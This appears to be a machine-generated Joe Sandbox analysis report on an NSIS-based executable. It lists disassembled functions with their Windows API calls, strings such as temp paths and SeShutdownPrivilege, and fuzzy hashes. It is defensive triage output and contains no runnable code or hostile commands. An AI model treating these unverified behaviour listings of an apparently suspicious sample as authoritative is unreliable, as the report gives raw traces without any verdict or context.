Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: b98f244c4997ac906f623e123468edec3404108b831d84f192b6a7b6dae47352
Instruction ID: 3a73a5ecaa8fddf8dab02391599d10e6f088d4e67d6af50185a53a7dc2f76cba
Opcode Fuzzy Hash: b98f244c4997ac906f623e123468edec3404108b831d84f192b6a7b6dae47352
Instruction Fuzzy Hash: D6F0FFB2A04119BFDB11EBA4DE88DAFBBBCEB44301B104476F601F2191C6749D018B79

Function 00405969 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 0040596F
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 00405978
lstrcatA.KERNEL32(?,00409014), ref: 00405989

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405969

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 4e6a192690b432b60a96f5238a9074c153a0d937d76e079e8aa32f917c06b110
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 7FD0A9A2A09930AAD31222158C05EAB6A4CCF42310B0A0062F200B22E2C77C0D418BFE

Function 00405A02 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
CharNextA.USER32(00000000), ref: 00405A15
CharNextA.USER32(00000000), ref: 00405A29

Strings

C:\, xrefs: 00405A03

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction ID: f957f906ea029efbd3510901c55ab9b0ae73d09d1d9c73be6bc34f8378a19dae
Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction Fuzzy Hash: C2F0C291B04FA06FFB32A2681C84F775A88CB55710F04116BE180662C2C2785C418F9A

Function 00403785 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002C0,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 00403797
CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 004037AB

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040378A
C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp, xrefs: 004037BB

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp
API String ID: 2962429428-142475776
Opcode ID: 8243f35e0eeb5762c06f3a20855541ba65908ed27c56bedd9f13c791d511c691
Instruction ID: 4fe8f3727f95cb8dfcfe97d6293448c3a92072a7c91c92fe8e25374afea9a46a
Opcode Fuzzy Hash: 8243f35e0eeb5762c06f3a20855541ba65908ed27c56bedd9f13c791d511c691
Instruction Fuzzy Hash: E6E08CB0900620DAC524AF7CBD859463B289B41335760C726F578F30F2C338AE875AAC

Function 00405084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050B3
CallWindowProcA.USER32(?,?,?,?), ref: 00405104

Part of subcall function 00404128: SendMessageA.USER32(0001045C,00000000,00000000,00000000), ref: 0040413A

Strings

, xrefs: 00405094

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction ID: e292fc6bb5149b142bd52d3e096dd2ae09329e4c6d4eed70fd370e7000aba408
Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction Fuzzy Hash: B2018F71504609ABDF205F11ED84AEF3765EB84750F208037FA01B92D1C77A9D92AFAE

Function 004059B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB6,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ODjwCjQBAP.exe,C:\Users\user\Desktop\ODjwCjQBAP.exe,80000000,00000003), ref: 004059B6
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB6,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ODjwCjQBAP.exe,C:\Users\user\Desktop\ODjwCjQBAP.exe,80000000,00000003), ref: 004059C4

Strings

C:\Users\user\Desktop, xrefs: 004059B0

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 4c364b2a586e3df4272a597733e657329f4de9264f8513980004e000b8aa575c
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 82D0C7E2419E709EF30352549D04B9F6E98DF16750F0A14A2F141E6192D77C5D418BAD

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Function 00405ACF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AF7
CharNextA.USER32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B08
lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction ID: b8bae3ead32ec2695fa88c6f2b94aa478c41e31f8fdb951db119f3f4d21ee890
Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction Fuzzy Hash: C1F0C231605518BFCB029FA5DC4099FBBB8EF46350B2140A5F800F7250D274FE019BA9

Analysis Process: ODjwCjQBAP.exePID: 6180, Parent PID: 5028COMMON

Non-executed Functions

Function 004032BF Relevance: 79.1, APIs: 33, Strings: 12, Instructions: 357stringcomfileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004032E4
GetVersion.KERNEL32 ref: 004032EA
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403313
#17.COMCTL32(00000007,00000009), ref: 00403335
OleInitialize.OLE32(00000000), ref: 0040333C
SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 00403358
GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040336D
GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 00403380
CharNextA.USER32(00000000,00429000,00000020), ref: 004033AB
GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004034A8
GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004034B9
lstrcatA.KERNEL32(0042A400,\Temp), ref: 004034C5
GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004034D9
lstrcatA.KERNEL32(0042A400,Low), ref: 004034E1
SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 004034F2
SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 004034FA
DeleteFileA.KERNEL32(0042A000), ref: 0040350E

Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD

OleUninitialize.OLE32(?), ref: 004035BC
ExitProcess.KERNEL32 ref: 004035DD
GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FA
OpenProcessToken.ADVAPI32(00000000), ref: 00403701
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403719
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403738
ExitWindowsEx.USER32(00000002,80040002), ref: 0040375C
ExitProcess.KERNEL32 ref: 0040377F

Part of subcall function 004056ED: MessageBoxIndirectA.USER32(00409230), ref: 00405748

Strings

~nsu, xrefs: 004035E8
Error launching installer, xrefs: 00403574
NSIS Error, xrefs: 0040335E
.tmp, xrefs: 00403604
Low, xrefs: 004034DB
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D3
", xrefs: 004033D0
TEMP, xrefs: 004034ED
SeShutdownPrivilege, xrefs: 00403713
TMP, xrefs: 004034F5
\Temp, xrefs: 004034BF
UXTHEME, xrefs: 00403307, 0040330C, 00403312

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3329125770-3941163293
Opcode ID: e18221ddd9e48752b7ffbdf688241eb0e22038d92db6db9d705f5ccec6b49e04
Instruction ID: 987bc29005933e48b9d04248005189ae3273ffe916fb5a61461eda946c2e522c
Opcode Fuzzy Hash: e18221ddd9e48752b7ffbdf688241eb0e22038d92db6db9d705f5ccec6b49e04
Instruction Fuzzy Hash: FCC109706082816AE7216F259D49A2F3EACEF81706F44447FF481761E2CB7C9A05CB6E

Function 00404A8D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404AA5
GetDlgItem.USER32(?,00000408), ref: 00404AB0
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AFA
LoadBitmapA.USER32(0000006E), ref: 00404B0D
SetWindowLongA.USER32(?,000000FC,00405084), ref: 00404B26
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B3A
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B4C
SendMessageA.USER32(?,00001109,00000002), ref: 00404B62
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6E
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B80
DeleteObject.GDI32(00000000), ref: 00404B83
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAE
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BBA
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C4F
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C7A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C8E
GetWindowLongA.USER32(?,000000F0), ref: 00404CBD
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CCB
ShowWindow.USER32(?,00000005), ref: 00404CDC
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DD9
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E3E
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E53
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E77
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E97
ImageList_Destroy.COMCTL32(?), ref: 00404EAC
GlobalFree.KERNEL32(?), ref: 00404EBC
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F35
SendMessageA.USER32(?,00001102,?,?), ref: 00404FDE
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FED
InvalidateRect.USER32(?,00000000,00000001), ref: 0040500D
ShowWindow.USER32(?,00000000), ref: 0040505B
GetDlgItem.USER32(?,000003FE), ref: 00405066
ShowWindow.USER32(00000000), ref: 0040506D

Strings

, xrefs: 00405045
M, xrefs: 00404C36
N, xrefs: 00404D17

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: ba7290f4b2f558e76718ca09df7d9ac4a37db348ff9a84ef3540181398f9072b
Instruction ID: e0cc5522092fb32f5c2674b78011ac89e49f6c9f2dab24d514a8ff43177d9d20
Opcode Fuzzy Hash: ba7290f4b2f558e76718ca09df7d9ac4a37db348ff9a84ef3540181398f9072b
Instruction Fuzzy Hash: 1E025EB0900209AFEB209F94DC85AAE7BB5FB84315F10817AF611B62E1C7799D42DF58

Function 00405799 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,75923410,75922EE0,00000000), ref: 004057C2
lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040580A
lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040582B
lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405831
FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405842
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058EF
FindClose.KERNEL32(00000000), ref: 00405900

Strings

\*.*, xrefs: 00405804
8B, xrefs: 004057F2

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 8B$\*.*
API String ID: 2035342205-1085368084
Opcode ID: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
Instruction ID: 8d03ba635bdf6d692437a4f2007131f6bbb84493a6188974bf12e3b4770be62e
Opcode Fuzzy Hash: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
Instruction Fuzzy Hash: 3E51AF71900A14EADF217B618C49BAF7AB8DF42724F14807BF850762D2D73C8992DE6D

Function 00406542 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
Instruction ID: 395035d2fa7d2bfd2a07fc8d885f942395c55dc3dc65efbd6096f39d55049081
Opcode Fuzzy Hash: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
Instruction Fuzzy Hash: 18F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96DF44

Function 0040524E Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004052AD
GetDlgItem.USER32(?,000003EE), ref: 004052BC
GetClientRect.USER32(?,?), ref: 004052F9
GetSystemMetrics.USER32(00000002), ref: 00405300
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405321
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405332
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405345
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405353
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405366
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405388
ShowWindow.USER32(?,00000008), ref: 0040539C
GetDlgItem.USER32(?,000003EC), ref: 004053BD
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053CD
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053E6
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F2
GetDlgItem.USER32(?,000003F8), ref: 004052CB

Part of subcall function 00404111: SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F

GetDlgItem.USER32(?,000003EC), ref: 0040540E
CreateThread.KERNEL32(00000000,00000000,Function_000051E2,00000000), ref: 0040541C
CloseHandle.KERNEL32(00000000), ref: 00405423
ShowWindow.USER32(00000000), ref: 00405446
ShowWindow.USER32(?,00000008), ref: 0040544D
ShowWindow.USER32(00000008), ref: 00405493
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054C7
CreatePopupMenu.USER32 ref: 004054D8
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054ED
GetWindowRect.USER32(?,000000FF), ref: 0040550D
